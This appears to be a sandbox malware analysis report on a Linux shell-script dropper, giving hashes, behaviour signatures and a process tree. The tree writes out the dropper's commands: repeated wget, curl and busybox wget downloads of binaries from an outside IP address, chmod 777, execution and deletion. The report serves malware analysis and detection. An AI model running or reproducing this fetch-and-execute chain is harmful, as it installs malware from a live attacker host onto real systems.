Analysis
- max time kernel: 59s
- max time network: 73s
- platform: debian-9_armhf
- resource: debian9-armhf-20240611-en
- resource tags: arch:armhf, image:debian9-armhf-20240611-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
- submitted: 21/10/2024, 01:28

Static task
- static1

Behavioral task
- behavioral1
  - Sample: 84b6d18fcbcdc01baf1474afb704de9dca24cb6759ec0110b085a70528b95478.sh
  - Resource: ubuntu1804-amd64-20240729-en

Behavioral task
- behavioral2
  - Sample: 84b6d18fcbcdc01baf1474afb704de9dca24cb6759ec0110b085a70528b95478.sh
  - Resource: debian9-armhf-20240611-en

Behavioral task
- behavioral3
  - Sample: 84b6d18fcbcdc01baf1474afb704de9dca24cb6759ec0110b085a70528b95478.sh
  - Resource: debian9-mipsbe-20240418-en

Behavioral task
- behavioral4
  - Sample: 84b6d18fcbcdc01baf1474afb704de9dca24cb6759ec0110b085a70528b95478.sh
  - Resource: debian9-mipsel-20240729-en
General
- Target: 84b6d18fcbcdc01baf1474afb704de9dca24cb6759ec0110b085a70528b95478.sh
- Size: 10KB
- MD5: ba972d8a71d4f6e168a2e85fed85abb5
- SHA1: d5a1c90cb3a5c93711516ffd0a1b453f2dab2d34
- SHA256: 84b6d18fcbcdc01baf1474afb704de9dca24cb6759ec0110b085a70528b95478
- SHA512: 9fedd59c9f5bba18e74051cda67828dcb72dd743e458801140e60e8820799de56e08cace0c1124ed1a4904a107367fea85941e62b1809200b6e7649abc0d43fb
- SSDEEP: 192:cyCVKOtLWhe6/TSK9QQx0YDcUO1NDc9Be6/TSKrQQx0EyCVKOb:iLWtVQQx0YDcUUNDc/DQQx0U
Malware Config
Signatures

- File and Directory Permissions Modification (1 TTPs, 25 IoCs)
  Adversaries may modify file or directory permissions to evade defenses.

  pid | Process
  794 | chmod
  800 | chmod
  835 | chmod
  869 | chmod
  887 | chmod
  893 | chmod
  747 | chmod
  770 | chmod
  849 | chmod
  855 | chmod
  861 | chmod
  875 | chmod
  716 | chmod
  829 | chmod
  905 | chmod
  913 | chmod
  807 | chmod
  734 | chmod
  788 | chmod
  817 | chmod
  823 | chmod
  841 | chmod
  881 | chmod
  899 | chmod
  688 | chmod

- Executes dropped EXE (25 IoCs)

  ioc | pid | Process
  /tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt | 690 | I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt
  /tmp/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw | 719 | VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw
  /tmp/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ | 736 | 3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ
  /tmp/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q | 749 | zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q
  /tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG | 772 | 6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG
  /tmp/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK | 789 | nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK
  /tmp/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW | 795 | UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW
  /tmp/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq | 801 | MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq
  /tmp/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh | 808 | WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh
  /tmp/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4 | 818 | Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4
  /tmp/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P | 824 | luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P
  /tmp/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT | 830 | U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT
  /tmp/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR | 836 | 7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR
  /tmp/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t | 842 | YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t
  /tmp/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW | 850 | UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW
  /tmp/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq | 856 | MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq
  /tmp/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh | 862 | WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh
  /tmp/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4 | 870 | Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4
  /tmp/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P | 876 | luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P
  /tmp/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT | 882 | U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT
  /tmp/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR | 888 | 7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR
  /tmp/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t | 894 | YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t
  /tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG | 900 | 6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG
  /tmp/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK | 906 | nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK
  /tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt | 914 | I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt

- Checks CPU configuration (1 TTPs, 25 IoCs)
  Checks CPU information, which can indicate whether the system is a virtual machine.

  description | ioc | Process
  File opened for reading | /proc/cpuinfo | curl
  File opened for reading | /proc/cpuinfo | curl
  File opened for reading | /proc/cpuinfo | curl
  File opened for reading | /proc/cpuinfo | curl
  File opened for reading | /proc/cpuinfo | curl
  File opened for reading | /proc/cpuinfo | curl
  File opened for reading | /proc/cpuinfo | curl
  File opened for reading | /proc/cpuinfo | curl
  File opened for reading | /proc/cpuinfo | curl
  File opened for reading | /proc/cpuinfo | curl
  File opened for reading | /proc/cpuinfo | curl
  File opened for reading | /proc/cpuinfo | curl
  File opened for reading | /proc/cpuinfo | curl
  File opened for reading | /proc/cpuinfo | curl
  File opened for reading | /proc/cpuinfo | curl
  File opened for reading | /proc/cpuinfo | curl
  File opened for reading | /proc/cpuinfo | curl
  File opened for reading | /proc/cpuinfo | curl
  File opened for reading | /proc/cpuinfo | curl
  File opened for reading | /proc/cpuinfo | curl
  File opened for reading | /proc/cpuinfo | curl
  File opened for reading | /proc/cpuinfo | curl
  File opened for reading | /proc/cpuinfo | curl
  File opened for reading | /proc/cpuinfo | curl
  File opened for reading | /proc/cpuinfo | curl

- Reads runtime system information

  description | ioc | Process
  File opened for reading | /proc/sys/crypto/fips_enabled | curl
  File opened for reading | /proc/self/auxv | curl
  File opened for reading | /proc/self/auxv | curl
  File opened for reading | /proc/self/auxv | curl
  File opened for reading | /proc/sys/crypto/fips_enabled | curl
  File opened for reading | /proc/self/auxv | curl
  File opened for reading | /proc/sys/crypto/fips_enabled | curl
  File opened for reading | /proc/sys/crypto/fips_enabled | curl
  File opened for reading | /proc/self/auxv | curl
  File opened for reading | /proc/sys/crypto/fips_enabled | curl
  File opened for reading | /proc/sys/crypto/fips_enabled | curl
  File opened for reading | /proc/self/auxv | curl
  File opened for reading | /proc/self/auxv | curl
  File opened for reading | /proc/self/auxv | curl
  File opened for reading | /proc/self/auxv | curl
  File opened for reading | /proc/self/auxv | curl
  File opened for reading | /proc/sys/crypto/fips_enabled | curl
  File opened for reading | /proc/sys/crypto/fips_enabled | curl
  File opened for reading | /proc/sys/crypto/fips_enabled | curl
  File opened for reading | /proc/self/auxv | curl
  File opened for reading | /proc/self/auxv | curl
  File opened for reading | /proc/sys/crypto/fips_enabled | curl
  File opened for reading | /proc/self/auxv | curl
  File opened for reading | /proc/self/auxv | curl
  File opened for reading | /proc/self/auxv | curl
  File opened for reading | /proc/sys/crypto/fips_enabled | curl
  File opened for reading | /proc/self/auxv | curl
  File opened for reading | /proc/sys/crypto/fips_enabled | curl
  File opened for reading | /proc/sys/crypto/fips_enabled | curl
  File opened for reading | /proc/sys/crypto/fips_enabled | curl
  File opened for reading | /proc/self/auxv | curl
  File opened for reading | /proc/sys/crypto/fips_enabled | curl
  File opened for reading | /proc/self/auxv | curl
  File opened for reading | /proc/sys/crypto/fips_enabled | curl
  File opened for reading | /proc/self/auxv | curl
  File opened for reading | /proc/self/auxv | curl
  File opened for reading | /proc/sys/crypto/fips_enabled | curl
  File opened for reading | /proc/sys/crypto/fips_enabled | curl
  File opened for reading | /proc/sys/crypto/fips_enabled | curl
  File opened for reading | /proc/self/auxv | curl
  File opened for reading | /proc/self/auxv | curl
  File opened for reading | /proc/self/auxv | curl
  File opened for reading | /proc/sys/crypto/fips_enabled | curl
  File opened for reading | /proc/sys/crypto/fips_enabled | curl
  File opened for reading | /proc/sys/crypto/fips_enabled | curl
  File opened for reading | /proc/sys/crypto/fips_enabled | curl
  File opened for reading | /proc/self/auxv | curl
  File opened for reading | /proc/sys/crypto/fips_enabled | curl
  File opened for reading | /proc/self/auxv | curl
  File opened for reading | /proc/sys/crypto/fips_enabled | curl

- System Network Configuration Discovery (1 TTPs, 10 IoCs)
  Adversaries may gather information about the network configuration of a system.

  pid | Process
  898 | busybox
  901 | rm
  751 | wget
  755 | curl
  767 | busybox
  772 | 6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG
  773 | rm
  897 | curl
  896 | wget
  900 | 6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG

- Writes file to tmp directory (25 IoCs)
  Malware often drops required files in the /tmp directory.

  description | ioc | Process
  File opened for modification | /tmp/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq | curl
  File opened for modification | /tmp/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT | curl
  File opened for modification | /tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt | curl
  File opened for modification | /tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt | curl
  File opened for modification | /tmp/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ | curl
  File opened for modification | /tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG | curl
  File opened for modification | /tmp/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh | curl
  File opened for modification | /tmp/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P | curl
  File opened for modification | /tmp/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4 | curl
  File opened for modification | /tmp/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW | curl
  File opened for modification | /tmp/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh | curl
  File opened for modification | /tmp/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR | curl
  File opened for modification | /tmp/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t | curl
  File opened for modification | /tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG | curl
  File opened for modification | /tmp/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw | curl
  File opened for modification | /tmp/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq | curl
  File opened for modification | /tmp/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT | curl
  File opened for modification | /tmp/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR | curl
  File opened for modification | /tmp/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P | curl
  File opened for modification | /tmp/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK | curl
  File opened for modification | /tmp/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q | curl
  File opened for modification | /tmp/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK | curl
  File opened for modification | /tmp/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW | curl
  File opened for modification | /tmp/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t | curl
  File opened for modification | /tmp/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4 | curl
Processes
Each entry is: executable path | command line | PID. Indentation shows the process depth in the tree; signature hits are listed beneath the process that triggered them.

- /tmp/84b6d18fcbcdc01baf1474afb704de9dca24cb6759ec0110b085a70528b95478.sh | /tmp/84b6d18fcbcdc01baf1474afb704de9dca24cb6759ec0110b085a70528b95478.sh | PID 648
  - /bin/rm | /bin/rm bins.sh | PID 650
  - /usr/bin/wget | wget http://87.120.126.196/bins/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt | PID 654
  - /usr/bin/curl | curl -O http://87.120.126.196/bins/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt | PID 664
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  - /bin/busybox | /bin/busybox wget http://87.120.126.196/bins/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt | PID 673
  - /bin/chmod | chmod 777 I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt | PID 688
    - File and Directory Permissions Modification
  - /tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt | ./I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt | PID 690
    - Executes dropped EXE
  - /bin/rm | rm I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt | PID 691
  - /usr/bin/wget | wget http://87.120.126.196/bins/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw | PID 692
  - /usr/bin/curl | curl -O http://87.120.126.196/bins/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw | PID 710
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  - /bin/busybox | /bin/busybox wget http://87.120.126.196/bins/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw | PID 714
  - /bin/chmod | chmod 777 VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw | PID 716
    - File and Directory Permissions Modification
  - /tmp/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw | ./VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw | PID 719
    - Executes dropped EXE
  - /bin/rm | rm VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw | PID 720
  - /usr/bin/wget | wget http://87.120.126.196/bins/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ | PID 722
  - /usr/bin/curl | curl -O http://87.120.126.196/bins/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ | PID 724
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  - /bin/busybox | /bin/busybox wget http://87.120.126.196/bins/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ | PID 730
  - /bin/chmod | chmod 777 3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ | PID 734
    - File and Directory Permissions Modification
  - /tmp/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ | ./3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ | PID 736
    - Executes dropped EXE
  - /bin/rm | rm 3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ | PID 737
  - /usr/bin/wget | wget http://87.120.126.196/bins/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q | PID 739
  - /usr/bin/curl | curl -O http://87.120.126.196/bins/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q | PID 741
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  - /bin/busybox | /bin/busybox wget http://87.120.126.196/bins/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q | PID 743
  - /bin/chmod | chmod 777 zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q | PID 747
    - File and Directory Permissions Modification
  - /tmp/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q | ./zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q | PID 749
    - Executes dropped EXE
  - /bin/rm | rm zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q | PID 750
  - /usr/bin/wget | wget http://87.120.126.196/bins/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG | PID 751
    - System Network Configuration Discovery
  - /usr/bin/curl | curl -O http://87.120.126.196/bins/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG | PID 755
    - Checks CPU configuration
    - Reads runtime system information
    - System Network Configuration Discovery
    - Writes file to tmp directory
  - /bin/busybox | /bin/busybox wget http://87.120.126.196/bins/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG | PID 767
    - System Network Configuration Discovery
  - /bin/chmod | chmod 777 6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG | PID 770
    - File and Directory Permissions Modification
  - /tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG | ./6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG | PID 772
    - Executes dropped EXE
    - System Network Configuration Discovery
  - /bin/rm | rm 6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG | PID 773
    - System Network Configuration Discovery
  - /usr/bin/wget | wget http://87.120.126.196/bins/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK | PID 775
  - /usr/bin/curl | curl -O http://87.120.126.196/bins/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK | PID 778
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  - /bin/busybox | /bin/busybox wget http://87.120.126.196/bins/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK | PID 785
  - /bin/chmod | chmod 777 nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK | PID 788
    - File and Directory Permissions Modification
  - /tmp/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK | ./nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK | PID 789
    - Executes dropped EXE
  - /bin/rm | rm nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK | PID 790
  - /usr/bin/wget | wget http://87.120.126.196/bins/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW | PID 791
  - /usr/bin/curl | curl -O http://87.120.126.196/bins/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW | PID 792
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  - /bin/busybox | /bin/busybox wget http://87.120.126.196/bins/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW | PID 793
  - /bin/chmod | chmod 777 UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW | PID 794
    - File and Directory Permissions Modification
  - /tmp/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW | ./UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW | PID 795
    - Executes dropped EXE
  - /bin/rm | rm UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW | PID 796
  - /usr/bin/wget | wget http://87.120.126.196/bins/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq | PID 797
  - /usr/bin/curl | curl -O http://87.120.126.196/bins/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq | PID 798
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  - /bin/busybox | /bin/busybox wget http://87.120.126.196/bins/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq | PID 799
  - /bin/chmod | chmod 777 MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq | PID 800
    - File and Directory Permissions Modification
  - /tmp/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq | ./MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq | PID 801
    - Executes dropped EXE
  - /bin/rm | rm MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq | PID 802
  - /usr/bin/wget | wget http://87.120.126.196/bins/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh | PID 803
  - /usr/bin/curl | curl -O http://87.120.126.196/bins/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh | PID 804
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  - /bin/busybox | /bin/busybox wget http://87.120.126.196/bins/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh | PID 805
  - /bin/chmod | chmod 777 WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh | PID 807
    - File and Directory Permissions Modification
  - /tmp/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh | ./WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh | PID 808
    - Executes dropped EXE
  - /bin/rm | rm WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh | PID 809
  - /usr/bin/wget | wget http://87.120.126.196/bins/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4 | PID 810
  - /usr/bin/curl | curl -O http://87.120.126.196/bins/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4 | PID 812
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  - /bin/busybox | /bin/busybox wget http://87.120.126.196/bins/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4 | PID 813
  - /bin/chmod | chmod 777 Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4 | PID 817
    - File and Directory Permissions Modification
  - /tmp/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4 | ./Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4 | PID 818
    - Executes dropped EXE
  - /bin/rm | rm Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4 | PID 819
  - /usr/bin/wget | wget http://87.120.126.196/bins/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P | PID 820
  - /usr/bin/curl | curl -O http://87.120.126.196/bins/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P | PID 821
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  - /bin/busybox | /bin/busybox wget http://87.120.126.196/bins/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P | PID 822
  - /bin/chmod | chmod 777 luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P | PID 823
    - File and Directory Permissions Modification
  - /tmp/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P | ./luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P | PID 824
    - Executes dropped EXE
  - /bin/rm | rm luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P | PID 825
  - /usr/bin/wget | wget http://87.120.126.196/bins/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT | PID 826
  - /usr/bin/curl | curl -O http://87.120.126.196/bins/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT | PID 827
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  - /bin/busybox | /bin/busybox wget http://87.120.126.196/bins/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT | PID 828
  - /bin/chmod | chmod 777 U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT | PID 829
    - File and Directory Permissions Modification
  - /tmp/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT | ./U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT | PID 830
    - Executes dropped EXE
  - /bin/rm | rm U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT | PID 831
  - /usr/bin/wget | wget http://87.120.126.196/bins/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR | PID 832
  - /usr/bin/curl | curl -O http://87.120.126.196/bins/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR | PID 833
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  - /bin/busybox | /bin/busybox wget http://87.120.126.196/bins/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR | PID 834
  - /bin/chmod | chmod 777 7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR | PID 835
    - File and Directory Permissions Modification
  - /tmp/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR | ./7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR | PID 836
    - Executes dropped EXE
  - /bin/rm | rm 7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR | PID 837
  - /usr/bin/wget | wget http://87.120.126.196/bins/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t | PID 838
  - /usr/bin/curl | curl -O http://87.120.126.196/bins/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t | PID 839
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  - /bin/busybox | /bin/busybox wget http://87.120.126.196/bins/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t | PID 840
  - /bin/chmod | chmod 777 YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t | PID 841
    - File and Directory Permissions Modification
  - /tmp/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t | ./YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t | PID 842
    - Executes dropped EXE
  - /bin/rm | rm YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t | PID 843
  - /usr/bin/wget | wget http://87.120.126.196/bins/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW | PID 844
  - /usr/bin/curl | curl -O http://87.120.126.196/bins/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW | PID 845
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  - /bin/busybox | /bin/busybox wget http://87.120.126.196/bins/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW | PID 848
  - /bin/chmod | chmod 777 UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW | PID 849
    - File and Directory Permissions Modification
  - /tmp/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW | ./UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW | PID 850
    - Executes dropped EXE
  - /bin/rm | rm UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW | PID 851
  - /usr/bin/wget | wget http://87.120.126.196/bins/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq | PID 852
  - /usr/bin/curl | curl -O http://87.120.126.196/bins/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq | PID 853
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  - /bin/busybox | /bin/busybox wget http://87.120.126.196/bins/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq | PID 854
  - /bin/chmod | chmod 777 MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq | PID 855
    - File and Directory Permissions Modification
  - /tmp/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq | ./MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq | PID 856
    - Executes dropped EXE
  - /bin/rm | rm MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq | PID 857
  - /usr/bin/wget | wget http://87.120.126.196/bins/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh | PID 858
  - /usr/bin/curl | curl -O http://87.120.126.196/bins/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh | PID 859
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  - /bin/busybox | /bin/busybox wget http://87.120.126.196/bins/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh | PID 860
  - /bin/chmod | chmod 777 WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh | PID 861
    - File and Directory Permissions Modification
  - /tmp/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh | ./WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh | PID 862
    - Executes dropped EXE
  - /bin/rm | rm WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh | PID 863
  - /usr/bin/wget | wget http://87.120.126.196/bins/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4 | PID 864
  - /usr/bin/curl | curl -O http://87.120.126.196/bins/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4 | PID 865
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  - /bin/busybox | /bin/busybox wget http://87.120.126.196/bins/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4 | PID 866
  - /bin/chmod | chmod 777 Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4 | PID 869
    - File and Directory Permissions Modification
  - /tmp/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4 | ./Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4 | PID 870
    - Executes dropped EXE
  - /bin/rm | rm Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4 | PID 871
  - /usr/bin/wget | wget http://87.120.126.196/bins/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P | PID 872
  - /usr/bin/curl | curl -O http://87.120.126.196/bins/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P | PID 873
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  - /bin/busybox | /bin/busybox wget http://87.120.126.196/bins/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P | PID 874
